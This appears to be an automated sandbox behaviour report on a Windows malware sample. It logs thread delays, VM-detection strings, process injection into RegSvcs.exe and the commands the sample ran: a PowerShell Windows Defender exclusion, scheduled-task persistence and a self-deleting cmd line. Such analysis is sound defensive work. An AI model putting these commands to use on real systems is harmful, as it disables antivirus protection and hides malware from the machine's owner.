Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599407
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599282
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596686
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596573
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596423
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595913
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593468

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7745	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1927	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 3132	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 6723	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1597

Source: C:\Users\user\Desktop\file.exe TID: 3088	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5668	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe TID: 2724	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596355	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595905	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595685	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599407
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599282
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596686
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596573
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596423
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595913
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593468

Source: djqdPdQRO.exe, 00000009.00000002.2283659383.0000000006986000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\L
Source: RegSvcs.exe, 00000007.00000002.2318609719.0000000000C86000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2484830377.000000000102F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: djqdPdQRO.exe, 00000009.00000002.2283659383.0000000006986000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:A

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\djqdPdQRO.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\djqdPdQRO.exe"			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 422000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 424000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 769008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 422000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 424000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B30008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\djqdPdQRO.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp8017.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp93EE.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
